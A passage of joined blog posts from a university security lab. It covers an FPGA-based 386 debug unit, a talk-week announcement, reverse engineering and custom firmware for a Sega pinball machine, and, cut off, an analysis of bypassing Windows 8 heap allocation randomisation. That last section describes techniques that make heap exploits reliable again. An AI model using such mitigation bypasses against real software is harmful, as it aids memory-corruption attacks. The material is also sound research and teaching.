Now that the execution flow has exited the reset state, it is now possible to set the CPU to protected mode. This can be achieved by loading a simple Global Descriptor Table which defines memory segments that will be used in protected mode. Notice that the jump to
reload_segs
is used to flush the instruction prefetch queue after enabling protected mode in order to validate segment reloading. This code can be improved by setting up an Interrupt Descriptor Table in addition to the Global Descriptor Table.
org 0x8000 startup: lgdt [gdtr] ;; Load Global Descriptor Table mov eax, cr0 ;; Enable protected mode or eax, 1 mov cr0, eax jmp reload_segs ;; Flush prefetch queue reload_segs: mov ax, 0x10 ;; Reload segment selectors mov ds, ax mov es, ax mov fs, ax mov gs, ax mov ss, ax ;; ljmp 0x08:0xF8400 dw 0xEA66 ;; Reload CS and jump to application code dd 0xF8400 dw 0x08 align 16 gdt: ... gdtr: Limit dw gdtr - gdt - 1 Base dd 0xF0000 + gdt
A 32-bit application can then be located at 0xF8400. The internal RAM is segmented according to the following layout :
As the In-System Memory Content Editor accepts a special binary format called MIF (Memory Initialization File), a dedicated OCaml script has been created to facilitate linking of several raw binary object files.
bin2mif -o fw.mif -b 0xF8000 0 \ # Memory base address -i pm.bin 0xF8000 0 \ # Jump to protected mode code -i app.bin 0xFC000 0 \ # Application code -i reset.bin 0xFFFF0 0 # Reset routine code
Providing debug facilities
Even though Altera’s FPGAs provide an efficient internal signal analyser thanks to SignalTap, it is a real pain to debug software when the size of the applications running on the
386
becomes significant. Adding a flexible on-chip debug facility based on UART communication to this design is one of the main challenges of this project.
Supervisor
The supervisor is designed using Altera’s QSys tool, which assists the creation of systems based on the NIOS II soft-processor. This system is composed of a private on-chip memory which contains NIOS instructions and data, and of a UART which is connected to the
FT230X
chip.
The protocol between the host and the supervisor is pretty simple: it considers that the CPU is at any time in one of these states:
STOP
: CPU is stopped. RESET
signal is asserted.
RUN
: CPU is running.
IORD
/IOWR
: CPU is trying to access IO ports. Read and write operations are distinguished. These states are used to allow device emulation.
BRK16
/BRK32
: CPU is ready to accept debug operations. Real and protected modes are distinguished.
It is sensible to implement the protocol logic through NIOS software instead of having it hardwired in Verilog. However, directly handling
386
signals on the NIOS is inefficient due to the execution speed of this system. The idea here is to offload the 386
signal handling job to another module dedicated to it: the On-Chip Debug Unit.
The OCD Unit can take control of the
386
buses at any time by asserting the ocd.en
signal, which disables the original bus controller described before. The communication between those two units is ensured by a dual-port shared memory accessible through the Avalon bus and two PIO registers. The first one, OCD_CTL
, is used to reset the OCD Unit from the supervisor. The second, OCD_STATUS
, indicates if the unit is running or not. The shared memory contains a routine that must be applied to the 386
.
On-Chip Debug Unit
This unit is basically a processor specially designed to handle
386
signals. It fetches its instructions from the 256 x 16-bit Avalon memory filled by the supervisor and operates on a 16 x 16-bit data space also located in shared memory.
While the supervisor can access the OCD program and data without restriction, the OCD Unit can only operate on its data space, which corresponds to offset
0x100
from the supervisor’s point of view. In the dedicated assembler, data memory is addressed using the R1
to R15
naming convention.
module ocd ( // OCD Control input rst, // Connected to OCD_CTL input clk, // 40MHz clock (synchronous with 20MHz CPU clock) output reg en, // Asserted if OCD Unit is attached to the 386 output reg stop, // Connected to OCD_STATUS // 80386 signals ... // RAM signals (Avalon) ... );
Implementing this kind of processor is quite simple and a basic one will be based on the following state machine :
As Avalon memory signals are always latched, reading from this memory takes two clock cycles: the first cycle is used to latch the address value and the second one latches the result on the data bus. Taking that into account, execution of a single instruction which reads and writes data memory cannot take less than five clock cycles.
- FETCH : Get instruction from program memory.
- LOAD : Latch source address into data memory.
- EXEC : Load source value from data memory and execute the instruction.
- STORE : Store result and compute next address of the next instruction.
- LATCH : Latch instruction address into program memory.
Instruction set is composed of several categories. The first one is used to control the OCD :
ATTACH
/DETACH
: Connect/Disconnect the OCD unit to 386 signals.
The second category includes instructions related to
386
signal processing:
LDD d
: Load data bus value into d
register.
LDAL d
/LDAH d
: Load address bus value into d
register.
LDWR d
: Load W/R#
signal into d
register.
LDDC d
: Load D/C#
signal into d
register.
LDMIO d
: Load M/IO#
signal into d
register.
STD s
: Set data bus value to s
register value.
START
/RESET
: Start/Reset the CPU.
READY
: Assert READY#
signal.
Of course, some instructions only operate on registers :
LDI d, imm16
: Load a 16-bit immediate into d
register.
MOV d, s
: Move s
register value into d
register.
CLR d
: Clear d
register.
The third category is about flow control. As the data memory only exposes one port to the OCD Unit, implementing a compare instruction which loads two registers is not possible in a single cycle. So a compare register has been added to the core. All comparisons are made against that register.
LDCMP s
: Load s
register value into the compare register.
CMP s
: Compare s
register value with the compare register value and store the result into the compare register.
BA
/BEQ
/BNE addr
: Branch to the specified address according to compare register value.
As an example, these instructions perform a jump to
label
if R1 is equal to R2:
LDCMP R1 ;; cmpr <- R1 CMP R2 ;; cmpr <- cmpr == R2 BEQ label ;; pc <- label if cmpr != 0
Some instructions can stay more than one cycle in the EXEC state in order to wait for an acknowledgement from the CPU during some bus operations:
HOLD
: Assert HOLD
signal and wait for HOLDA
signal.
INT
: Assert INT
signal and wait for INTA
signal.
EXIT
: Stop OCD routine execution. Never leaves the EXEC state and asserts the ocd.stop
signal.
This wait state mechanism is also used to implement instructions used to wait for a particular event on the bus. All those instructions deassert
READY#
signal and attach the OCD
to the 386
when the expected condition is triggered.
WAITADS
: Wait for ADS#
signal to be asserted
WAITIO
: Wait for ADS#
and M/IO#
getting low
WAITLOCK
: Wait for ADS#
and LOCK#
to be asserted
The block diagram of this unit can be represented as :
Here are the routines used to reset and start the CPU from the OCD Unit. Notice that the start routine lets the original bus controller operate on the
386
until an IO access is performed. The supervisor just has to be interrupted when the OCD exits the start routine in order to handle the IO request. Devices can then be emulated by the supervisor or by the host.
.func ocd_prgm_reset RESET ;; RESET <- 1 EXIT .func ocd_prgm_start START ;; RESET <- 0 DETACH ;; Let bus controller to handle CPU signals WAITIO ;; Wait for IO access to attach OCD Unit LDAL R1 ;; Get IO port address LDWR R2 ;; Get IO operation type EXIT
Example : Obtaining CPU registers
Now that the OCD Unit internals have been presented, the purpose now is to use it to get CPU registers.
Before applying debug operations on the CPU, it is necessary to stop execution and set it up in a known state. The simplest method to interrupt a
386
without having to care about the interrupt flag is to send a Non Maskable Interrupt. Unlike the INTR
signal, the NMI
mechanism does not provide any acknowledgement from the CPU. So the only way to know whether the CPU actually took the NMI into account is to wait for the LOCK#
signal assertion. Indeed, the 386
locks the whole bus when it accesses an IDT or IVT entry. The WAITLOCK
instruction has been designed for that specific purpose.
.func ocd_prgm_break NMI ;; Set NMI signal WAITLOCK ;; Wait for ADS# and LOCK# signals then attach OCD unit
On the next step, the behaviour of the CPU is different according to its mode. If the
386
is still in real mode, it will fetch the code segment and the offset of the NMI handler located in the Interrupt Vector Table. As the IVT always starts at 0x0000000
, the address 0x0000008
will be output after triggering the NMI.
On the other hand, if protected mode is enabled, the CPU will fetch an Interrupt Descriptor corresponding to the NMI. This structure is located in the Interrupt Descriptor Table, which can be found anywhere in the address space.
As the processor mode is unknown at that moment, it can be deduced from the first requested address after NMI :
;; Get CPU Mode LDAL R2 ;; Load requested address LDAH R3 LDCMP R2 LDI R1, 0x0008 CMP R1 BNE break_protected_mode ;; Branch to protected mode handler if ;; A[15:0] != 0x0008 LDCMP R3 BEQ break_real_mode ;; Branch to real mode handler if ;; A[23:16] is equal to the NMI entry ;; offset on the IVT
Only protected mode will be considered for the rest of the example.
As IDT set by the application cannot be trusted, using the OCD Unit to drive a valid interrupt gate is conceivable :
;; Fake IDT entry LDI R1, 0b1000111000000000 ;; Flags STD R1 WAITADS LDI R1, 0x000D ;; Offset[31:16] STD R1 WAITADS LDI R1, 0x0000 ;; Offset[15:0] STD R1 WAITADS LDI R1, 0x0008 ;; Segment Selector STD R1 WAITADS
A code segment reload is always performed before jumping to the interrupt handler. So a read to a GDT entry will be requested by the CPU.
In the same way, it is painless with this mechanism to drive a valid code segment :
;; Fake GDT entry LDI R1, 0b1001101000000000 ;; Flags | Base[23:16] STD R1 WAITADS LDI R1, 0x00CF ;; Base[31:24] | G | D/B | Limit[19:16] STD R1 WAITADS LDI R1, 0xFFFF ;; Limit[15:00] STD R1 WAITADS LDI R1, 0x0000 ;; Base[15:0] STD R1 WAITADS READY ;; GDT Access bit WAITADS
Finally, as
EFLAGS
, EIP
and CS
registers have been modified, they are pushed on the stack. However, the bus controller is disconnected from the CPU signals: this means that no actual writes to memory are performed during this operation. Instead, it is straightforward to load those values into OCD registers:
;; Context saving LDD R2 ;; EFLAGS[15:0] READY WAITADS LDD R3 ;; EFLAGS[31:16] READY WAITADS LDD R4 ;; CS READY WAITADS LDD R5 ;; EIP[15:0] READY WAITADS LDD R6 ;; EIP[31:16] READY
Afterwards, the CPU will try to fetch instructions from the interrupt handler. So
HOLD
signal is asserted at the end of the break
routine. This leaves the supervisor time to load the next routine into the OCD program memory.
At this point, the
386
is in a known and valid state, which allows us to inject any instruction sequence. In order to obtain the CPU registers, the pusha
instruction can be injected:
.func ocd_prgm_get_regs LDI R1, 0x9060 LDI R2, 0x9090 WAITADS ;; Fill instruction prefetch queue STD R1 ;; Drive PUSHA; NOP WAITADS STD R2 ;; Drive NOP; NOP WAITADS STD R2 ;; Drive NOP; NOP WAITADS STD R2 ;; Drive NOP; NOP WAITADS STD R2 ;; Drive NOP; NOP WAITADS ;; PUSHA LDD R0 READY WAITADS ... LDD R15 READY HOLD ;; Hold CPU in order to avoid instruction fetch during ;; loading of the next OCD routine EXIT
However,
pusha
instruction modifies the ESP
value. In the same way, a mov
instruction can be used to restore ESP
and set any register value.
When the debugging phase is over, a continue routine is executed, which basically injects an
iret
and drives the original values of EIP
, CS
and EFLAGS
.
For now, the debug unit is provided with a CLI allowing simple CPU interactions. When more debug features are available, the goal is to embed a gdb stub into the host application.
[lsepc-monitor] start [lsepc-monitor] status CPU Status: RUN [lsepc-monitor] break [lsepc-monitor] status CPU Status: Break (Protected Mode) [lsepc-monitor] getregs EFLAGS: 00000046 EIP: 000fd024 ESP: ffe4000c EBP: 00000123 EAX: 1100bbaa EBX: 5544000f ECX: 9988ffee EDX: ddcc7766 ESI: 456789ab EDI: cdef9090 CS: 0008 [lsepc-monitor] continue [lsepc-monitor] status CPU Status: RUN
Conclusion
Developing and testing on the LSE-PC is still mainly based on the JTAG interface. When connected to a JTAG interface, the FPGA design exposes the following entry points :
- RAM/ROM editor : used to perform on-chip operation on the internal memory
- NIOS II interface : used to program and debug the NIOS II contained on the supervisor
- Serial Flash Loader : used to program the SPI flash which contains FPGA configuration
- SignalTap : used to perform signal analysis.
This board is still a proof of concept. However, building it was an excellent exercise for understanding how the original
80386
CPU works under the hood.
Although some work needs to be done to get a usable on-chip debugger, the hardware part and the simple embedded chipset are reliable enough to allow execution of simple applications.
Links
References
- It is basically a cut-down version of the original
LSE Summer Week 2015 Announcement
For the fifth year, we are going to give 4 days of talks to show the work we are doing here at the LSE, about various themes we like, have encountered or overall judge interesting.
The schedule will be as follows:
- July, Wednesday the 15th in the evening
- July, Thursday the 16th in the evening
- July, Friday the 17th in the evening
- July, Saturday the 18th all day
The exact planning and subjects addressed will be announced later, as well as the exact timetable. As we did last year, we are also opening the talks to external contributors and all LSE members, present or past.
The presentations will be held in French as usual and we will try to record everything.
If you want to propose a talk, you can contact us at contact@lse.epita.fr or on #lse@rezosup. The deadline for submitting content is June 26.
The official page of the LSE Summer Week 2015 is available in French here.
Hacking a Sega Whitestar Pinball
Sega Starship Troopers Pinball Overview
The
Sega Starship Troopers Pinball
is fairly representative of the WhiteStar Board System used in several Sega and Stern pinball games. This hardware architecture was first designed in 1995 for the Apollo 13 game, with the objective of being convenient and extensible so that it could be reused for other playfields. This way, Sega could exploit a large number of licenses without having to design new control circuits for each machine.
This architecture is based on three Motorola
68B09E
clocked at 2MHz and used as main CPU, display controller and sound controller. The last two are mainly dedicated to supervising application-specific processors: for instance, the 6809
used on the display board is in charge of interfacing a 68B45
CRT controller to the main CPU. The sound processing is handled by a BSMT2000
, a custom masked-ROM version of the TI TMS320C15
DSP.
Sega used this system for 16 other games including GoldenEye, Star Wars and Starship Troopers.
Playfield’s wiring
The playfield wiring is quite simple: all switches are arranged in a matrix grid. This method provides a simple way to handle a high number of I/O with a reasonable number of connectors. So, in order to read the state of the switches, the CPU has to scan each row of the matrix by grounding it and watching in which column the current is flowing.
A similar circuit is used to control playfield lamps: each row has to be scanned by grounding it and applying voltage on the column connector according to the lamps that have to be switched on in the selected row.
It’s truly easy to control a high number of lamps with this layout. The following code switches on the lamp 31 (multiball).
lda #$8 sta LAMP_ROW ;; Ground selected row clra sta LAMP_AUX ;; Clear auxiliary rows lda #$40 sta LAMP_COL ;; Drive selected column
Although playfield switches are handled by the matrix grid, some frequently used buttons are connected to a dedicated connector. This allows the CPU to directly address this input without having to scan the entire input matrix. These switches are user buttons and End-Of-Stroke.
The E.O.S switch prevents foldback when the player has the flipper energized to capture balls. When the Game CPU detects that this switch is open, it stabilizes the position of the selected flip by reducing the pulse applied to the coil.
The Backbox
The Backbox contains all the electronic circuits controlling playfield’s behaviour. We will focus on this very part throughout the article.
CPU/Sound Board
The main board contains the Game CPU and the Sound circuit. The switches are directly connected to this board so that it is really simple for the CPU to fetch their values.
One of the main problems of this board is the battery location. Populated with a 3xAA battery holder to keep the RAM content alive, alkaline batteries are located on top of the CPU, ROM and RAM chips, which becomes critical when they start to leak onto these components. Before I started playing with this machine, I spent hours restoring and cleaning the PCB because of the corrosive leakage. To avoid deterioration, relocating this battery could be a smart idea.
Display Controller Board
Like many pinball machines from the 90s, the backbox is equipped with an old school dot matrix display.
As the CPU Board, it is based on a Motorola
68B09E
with a dedicated 512KB UVPROM which contains the dot matrix display driver code and images that can be displayed on it. It communicates with the main board via a specific protocol. To interface the raster display, the board uses a Motorola
68B45
(68B45 CRTC
for “cathode ray tube controller”). Although this chip was primarily designed to control the CRT display, it can also be used to generate correctly timed signal for a raster dot matrix display like in this case.I/O Power Driver Board
The IO Power Driver Board is an interface between the low current logic circuit and the high current playfield circuit.
The first part of this circuit consists of converting the alternating current provided by the transformer into exploitable direct current thanks to 5 bridge rectifiers.
The only electromagnetic relay is dedicated to the general illumination and is not controllable via the main CPU. The rest is driven by MOSFET power transistors which are designed to be able to handle high current in order to power playfield coils. Moreover, fuses are placed before each bridge rectifier in order to help identify where the problem comes from in case of failure.
Upgrading the firmware
The title screen displayed in the dot matrix plasma display indicates that the firmware’s version is
2.00
. However, an up-to-date image of this ROM exists in Internet Pinball Database which seems to be on version2.01
according to the ascii string located at offset$66D7
. Let’s try to upgrade the pinball!An almost suitable flash memory to replace the original UVPROM is the
A29040C
. The only mismatches on the pinout are theA18
andWE
pins. This is a minor problem since I fixed the PCB to match theA29040C
layout.Burning the
A29040C
with the new firmware requires a flash memory programmer. I decided to craft one with anArduino mega 1280
based on anAVR Atmega 1280
microcontroller. The large number of IO of this chip is essential to complete the programming protocol of theA29040C
.After successfully programming the flash memory, I was pretty disappointed when I noticed that the new ROM chip was still not working.
I thought that this UVPROM was able to store 512KB of data, just like
A29040C
. It took me a while to realise that the game is a 128KB ROM although the chip is designed to be connected to a 19 bit address bus. This means that the game’s ROM simply ignores the value ofA17
andA18
signals, which means that the game code is mirrored 4 times in the whole ROM address space.Building a custom ROM
Now that we are able to substitute the original ROM with a custom flash memory, let’s try to run our own code on this machine.
The first thing that we have to do in this case is to determine where the CPU will fetch its first instruction after a reset. According to the
6809
datasheet, the interrupt vector table (which contains the address of the reset
event handler) is located at0xFFFE
. However, this offset refers to the CPU address space, not that of the ROM chip. So, after a reset, which part of this memory is mapped at0xFFFE
?To answer this, it’s essential to follow the address bus of the UVPROM. We then easily see that bits 14 to 18 of this bus are connected to 5-bit register (
U211
) while bits 13 to 0 are directly bound to CPU address bus.This is a typical configuration to implement a bank system since the CPU address space is too narrow to map the entire ROM. That’s why only one part of it (also called a bank) is mapped at a given time. The mapped bank is chosen by the
U211
register, calledXA
, and can be easily written by the CPU when a bank switch is needed.
Finding address space
On this kind of device, it’s always painful to debug the code running directly on the board. The only way to achieve it here is to trigger some visual element of the playfield in order to get a basic tracing of the execution flow.
As there is no IO port on the
6809
, all devices are memory-mapped. The question now is: where are they located?First, let’s focus on the address decoding circuit of the IO Board.
In order to simplify cascading, the
74138
decoder/demultiplexer generates output only if the Boolean expression G1 && !G2A && !G2B
is true. So, in this circuit,U204
covers IO addresses from0x0
to0x7
andU205
handles from0x8
to0xF
.As we can see on this schematic, the question is: where does the
IOSTB
signal come from? Following the wire, we can see that this control signal is generated by the CPU Board. It actually acts as a chip select: it means that this signal is used to indicate to the IO Board that we are addressing it.
To be more precise, the
IOSTB
is driven by theU213
chip, aPAL16L8
(Programmable Array Logic). This kind of integrated circuit is used to implement combinational logic expressions. This is widely used for address decoding. Dumping the logical expression programmed on this chip is essential to determine the actual CPU address space. One way to do it is to basically test all possible inputs and watch how the outputs evolve according to input values. However, some of the
PAL16L8
pins can be considered as inputs as well as outputs. In this case, we can guess thatXA0
,A9
andA10
are used as input pins according to the rest of the circuit.I desoldered the PAL, in order to prevent undesired side effect on the rest of the circuit, and used a simple Arduino Uno to generate the truth tables of all outputs.
Now, let’s extract irreducible logical expressions from the recorded truth tables. As a matter of fact, these truth tables are significantly too large to apply the well-known Karnaugh map method to simplify the extended logical expression. This problem can be solved by using the electruth python module. It fully implements the Quine-McCluskey method which is perfectly suitable in this situation.
After a few hours of computation, I got these expressions, which are truly helpful in the address space determination process:
~ROMCS = A15 || A14 ~RAMCS = !A15 && !A14 && !A13 && (!A12 || !A11 || !A10 || !A9 || RW || MPIN) IOPORT = !(!A15 && !A14 && A13 && !A12 && !A11 && !XA0) IOSTB = !A15 && !A14 && A13 && !A11
Notice the
MPIN
input which is a signal generated by the cabinet door when it’s open. So, thePAL
restricts the access to a small part of the RAM when the coin door is closed. This section is actually used to store game settings that are only editable for maintenance purpose.Here is the address space that I was finally able to discover according to the actual wiring:
0000
-1FFF
: RAM0000
-1DFF
: Read/Write Area1E00
-1FFF
: Write Protected Area
2000
-27FF
: IO (IOBOARD)2000
: HIGH CURRENT SOLENOIDS A- bit 0 : Left Turbo Bumper
- bit 1 : Bottom Turbo Bumper
- bit 2 : Right Turbo Bumper
- bit 3 : Left Slingshot
- bit 4 : Right Slingshot
- bit 5 : Mini Flipper
- bit 6 : Left Flipper
- bit 7 : Right Flipper
2001
: HIGH CURRENT SOLENOIDS B- bit 0 : Trough Up-Kicker
- bit 1 : Auto Launch
- bit 2 : Vertical Up-Kicker
- bit 3 : Super Vertical Up-Kicker
- bit 4 : Left Magnet
- bit 5 : Right Magnet
- bit 6 : Brain Bug
- bit 7 : European Token Dispenser (not used)
2002
: LOW CURRENT SOLENOIDS- bit 0 : Stepper Motor #1
- bit 1 : Stepper Motor #2
- bit 2 : Stepper Motor #3
- bit 3 : Stepper Motor #4
- bit 4 : not used
- bit 5 : not used
- bit 6 : Flash Brain Bug
- bit 7 : Option Coin Meter
2003
: FLASH LAMPS DRIVERS- bit 0 : Flash Red
- bit 1 : Flash Yellow
- bit 2 : Flash Green
- bit 3 : Flash Blue
- bit 4 : Flash Multiball
- bit 5 : Flash Lt. Ramp
- bit 6 : Flash Rt. Ramp
- bit 7 : Flash Pops
2004
: N/A2005
: N/A2006
: AUX. OUT PORT (not used)2007
: AUX. IN PORT (not used)2008
: LAMP RETURNS2009
: AUX. LAMPS200A
: LAMP DRIVERS
3000
-37FF
: IO (CPU/SOUND BOARD)3000
: DEDICATED SWITCH IN- bit 0 : Left Flipper Button
- bit 1 : Left Flipper End-of-Stroke
- bit 2 : Right Flipper Button
- bit 3 : Right Flipper End-of-Stroke
- bit 4 : Mini Flipper Button
- bit 5 : Red Button
- bit 6 : Green Button
- bit 7 : Black Button
3100
: DIP SWITCH3200
: BANK SELECT3300
: SWITCH MATRIX COLUMNS3400
: SWITCH MATRIX ROWS3500
: PLASMA IN3600
: PLASMA OUT3700
: PLASMA STATUS
4000
-7FFF
: ROM8000
-BFFF
: ROM (Mirror)C000
-FFFF
: ROM (Mirror)
Handling reset circuitry
In this kind of real-time application, where a huge number of unpredictable events have to be handled, the risk of race conditions cannot be fully eliminated.
Although the software is designed to be able to face any situation, the hardware has to be prepared for a faulty program. One of the simplest and most robust methods is to use a watchdog timer. This consists of an autonomous timer in charge of triggering a reset signal to the system if it reaches its initial point. The main idea here is to force the circuitry to be stopped if it does not correctly respond in order to prevent any damage from uncontrolled behaviour.
In most cases, the timer has to be fed by the software running on the CPU. So, if we want to run our own code on that machine, it’s essential to implement as a subroutine the reset of the watchdog in order to stay alive.
In the Whitestar pinball, two distinct watchdogs have to be correctly handled. The first one is located on the CPU/Sound Board and is directly connected to the reset pin of the
6809
. SEGA engineers chose to use aDS1232
chip (U210
) which integrates all the features that are commonly used to monitor a CPU. So, in addition to a regular watchdog timer, this chip also provides a power monitoring and an external override which is actually designed to allow the use of a push button to force the CPU reset (SW200
).As the
TOL
pin of this chip is grounded, theDS1232
continually watches the voltage applied onVcc
pin and triggers a reset signal if its value is under 4.7V. From a software engineer point of view, the important pin in that case is the strobe input (ST
): it is used to reset the watchdog timer when a falling edge is applied to it.On the CPU/Sound Board, this pin is connected to either clock signal (generated by
U2
) orBSEL
signal according to the location of the jumper (Wx
orWy
). AsWx
was jumpered on my board, we can assume that the configuration in whichWy
is fit was used during firmware development. So programmers were able to test their code without having to mind about the watchdog reset: this was automatically done by the clock signal. When the pinball was about to be released, calls to the watchdog reset subroutine were injected in appropriate parts of the firmware and the jumper was moved fromWy
toWx
.In my opinion, modifying the hardware by desoldering the jumper and resoldering it on
Wy
is a little bit too easy to solve this kind of problem. So, let’s try to handle the watchdog timer with a suitable software subroutine.The
BSEL
signal is generated when writing at address0x3200
and is actually used as clock signal for the bank selection (U211
). This is a clever way to get a nonintrusive watchdog reset subroutine: it’s, in fact, hooked on the bank switching mechanism. The hardware designers probably thought it was a good idea to check the regularity of the code execution only by testing a periodic bank switching…In our case, we do not need to switch from initial bank. The trick I used here is to write
0
in theXA
register, so the bank is unchanged but the watchdog is fed anyway.The second watchdog is located on the IO Board. The chip used is still a
DS1232
(U210
) but the wiring is a little bit different. Firstly, since there is no code running on that board, the reset pin of theU210
is not connected to a CPU but to all registers (8-bit D flip-flop) which drive power transistors.Secondly, there is no reset pushbutton on the IO Board. The
PBRESET
pin is connected to theBRESET
signal coming directly from the CPU/Sound board. So, if the first DS1232
triggers a reset signal, it automatically overrides the second watchdog timer and forwards the signal to all IO Board components. However, this is not reciprocal: the IO Board cannot stop the CPU/Sound Board. The strobe input of this watchdog is directly connected to the
DAV0
signal which is used to ground the first row of the lamp matrix. This means that the firmware has to frequently scan it to keep the IO Board alive. Tricky, but not fully irrelevant since the lights are still blinking on this kind of arcade machine in order to keep the game catchy. All of this reset circuitry has to be kept in mind when developing a firmware for this kind of platform.
Final code
After many hours spent to reverse engineer the hardware part of this machine, I was finally able to print LSE on the 7-segment display of the playfield thanks to the code fetched from a custom flash ROM.
Here is the assembly code of my own basic firmware:
LAMP_ROW EQU $2008 LAMP_AUX EQU $2009 LAMP_COL EQU $200A BANK_SELECT EQU $3200 ;; CPU/Board Watchdog reset wdr .MACRO clra sta BANK_SELECT .ENDM ;; Dummy delay subroutine delay .MACRO i lda i @l: deca bne @l .ENDM ;; Entry point .ORG 0xC000 main: ldx #lamps clrb stb LAMP_AUX ;; Clear auxiliary rows incb ;; Select first row loop: clra sta LAMP_ROW sta LAMP_COL ;; Clear rows and colunms delay #$1F ;; Dummy delay lda ,x+ ;; Fetch columns value sta LAMP_COL ;; Set columns stb LAMP_ROW ;; Ground selected row delay #$1F ;; Dummy delay wdr ;; Watchdog reset lslb ;; Select next row bne loop ;; Branch if the first 8 rows are not updated bcc main ;; Branch if the 9th row is updated rolb stb LAMP_AUX ;; Select the 9th row clrb bra loop ;; Lamp matrix values lamps: DB $01, $00, $00, $00, $00 DB $00, $1C, $B6, $9F, $00 ;; Interrupt vector table .ORG 0xFFFE reset: DW main
tpasm
is needed to assemble the preceding code and turn it into an Intel hex file using the following commands:$ tpasm -P 6809 -o intel cpu.hex cpu.s $ hex2bin ./cpu.hex $ dd if=/dev/zero of=cpu.rom bs=16K count=32 $ dd if=cpu.bin of=cpu.rom bs=16K seek=31
Conclusion
Hacking this kind of machine has been as rewarding for me as it is for some people to play flipper.
Unfortunately, Sega Pinball left the market in 1999 (2 years after releasing the Starship Troopers pinball…) and sold all pinball assets to Stern Pinball, Inc. This company used the WhiteStar architecture until 2005 with the NASCAR arcade machine. When The Lord of the Rings was released in 2003, they edited some part of the sound system by replacing the
Motorola 6809
/BSMT2000
duo by a 32-bitAtmel AT91SAM
ARM-based CPU and threeXilinx FPGAs
. So the6809-BSMT2000
system is fully emulated by this circuit to provide backward-compatibility.Now that we have hacked the hardware, what about reverse engineering the original firmware? Maybe another time…
I hope you enjoyed this guided tour!
References
Getting back determinism in the Low Fragmentation Heap
Introduction
The Low Fragmentation Heap is the Front End allocator for the userland in modern Windows OS. It was introduced in 2001 in Windows XP and has been used by default since Windows Vista. Microsoft has introduced a lot of new mitigations in response to
generic
attack against the LFH since its first disclosure in Windows XP. One of them, introduced in Windows 8, is the non-determinism of the allocation. This mitigation has quite a lot of consequences because it will break most of the overflows exploits but also use-after-free exploits.Low Fragmentation Heap
The goal of the Low Fragmentation Heap is, as its name says, to reduce fragmentation. It is not a different heap but a different policy. Here is a global overview of how the allocation is made by Windows:
The HeapAlloc and HeapFree functions will make some tests and decide if it should call the back-end or the front-end, which means the LFH since the removal of the Look-Aside-List. There are some conditions for an allocation to be made by the LFH:
- The size must be inferior to 0x4000 bytes
- The LFH must be activated for this heap. It is possible to deactivate the LFH in a heap by setting HEAP_NO_SERIALIZE when creating a heap with HeapCreate.
- The LFH must be activated for this allocation. It is also possible to deactivate the LFH for a particular allocation (still with HEAP_NO_SERIALIZE).
- There must be enough allocation for activating the LFH for this size.
The function in charge of the allocation for the LFH is
RtlpLowFragHeapAllocFromContext
and the one for the back-end isRtlpAllocateHeap
which will use the VirtualAlloc from the system.If you want more details about how the LFH works, you can look at my presentation in french about this subject during the lse summer week 2014, or read the excellent paper Windows 8 Heap Internals by Chris Valasek and Tarjei Mandt.
Mitigation
Microsoft has introduced two factors of randomization with Windows 8. The first one is to add a random offset for each virtual allocation, its primary goal is removing the predictability of heap metadata for preventing their corruption. The second is for randomizing the UserBlock returned by an allocation.
Before those changes, a simple code like this:
#include <Windows.h> #include <stdio.h> #include <iostream> int main() { HANDLE hHeap = GetProcessHeap(); int i = 0; int size = 0x40; LPVOID chunk; // lfh activation while (i < 0x10) { chunk = HeapAlloc(hHeap, 0, size); i++; } chunk = HeapAlloc(hHeap, 0, size); printf("\n\nchunk1: %p\n", chunk); HeapFree(hHeap, 0, chunk); chunk = HeapAlloc(hHeap, 0, size); printf("\n\nchunk2: %p\n", chunk); HeapFree(hHeap, 0, chunk); }
would give us an output which is predictable and will allow us to trigger a simple use-after-free:
chunk1: 011D8CC0 chunk2: 011D8CC0
The same code since Windows 8 will give us this result:
chunk1: 011D8CC0 chunk2: 011D8DE0
We can clearly see that the result is not easily predictable anymore. The next question is how is this implemented ? The implementation is pretty simple, in
RtlpCreateLowFragHeap
there is a call toRtlpInitializeLfhRandomDataArray
:It will basically fill the
RtlpLowFragHeapRandomData
array with 0x100 random values. This array will then be used with a value calledLowFragHeapDataSlot
from the TEB (Thread Environment Block) which is use for storing value by thread.mov ecx, large fs:18h ; getting the current TEB movzx esi, word ptr [ecx+0x0FAA] ; getting LowFragHeapDataSlot lea eax, [esi+1] ; adding 1 to LowFragHeapDataSlot and eax, 0xff ; checking we don't go past the 0x100 mov [ecx + 0x0faa], ax ; rewrite LowFragHeapDataSlot + 1 movzx eax, byte ptr RtlpLowFragHeapRandomData[esi] ; getting the value at offset of LowFragHeapDataSlot
This value is then used with a ror on the bitmap to determine the position where to start, and from this position it will look for the first free block in the bitmap which will allow to make two consecutive allocations to not be at predictable place.
Attacks
In 2008 at Ruxcon, Ben Hawkes presented Attacking the Vista Heap. In his slides he made several claims, and more precisely:
Application specific attacks are the future
. This is probably more true than ever with a heap implementation like the one we get since Windows 8, and the non-determinism of the allocation is a big problem even for application specific attacks. This mitigation has been well documented but I haven’t found any documentation about how to bypass it.
First attack
The first basic attack we can think of is the idea to fill all the slots except one with the object we want to overwrite. We then fill the last slot remaining with the object in which we can overwrite.
This technique will work perfectly for use-after-free because we don’t care about the data located right before or right after it. On the contrary, for a classic overflow we really care about what is after (I don’t consider underflow but it is basically the same principle). If you control the whole userblock you have fair chances of success: the only case for which it will not work is if we get the last chunk.
But if there is some allocations made for the user blocks the probability of success will decrease a lot because you have more position which will end with a failure.
It also means that you need to be able to allocate enough time the data you want to overflow which could not be the case and in the end you will not be able to know which one you overflowed so you will need a way to test this.
Second attack
In the mitigation part we saw that for getting a random value the
RtlpLowFragHeapAllocFromContext
function take a value from the pre-populatedRtlpLowFragHeapRandomData
array. This array is changed in only two occasions:- in the
RtlpInitializeLfhRandomDataArray
function when creating the LFH - in the
RtlpSubSegmentInitialize
function which is called byRtlpLowFragHeapAllocFromContext
when a subsegment needs initialization
So basically this array is not re-populated often, and we can make allocations without the array being changed. The counter is stored in the TEB and is incremented after each use of the array. Since the counter must stay smaller than the array’s size, a modulo 0x100 is applied. That means that we can just make 0xff allocations and go back to the same position in the array. The following code will allow us to get twice the same chunk:
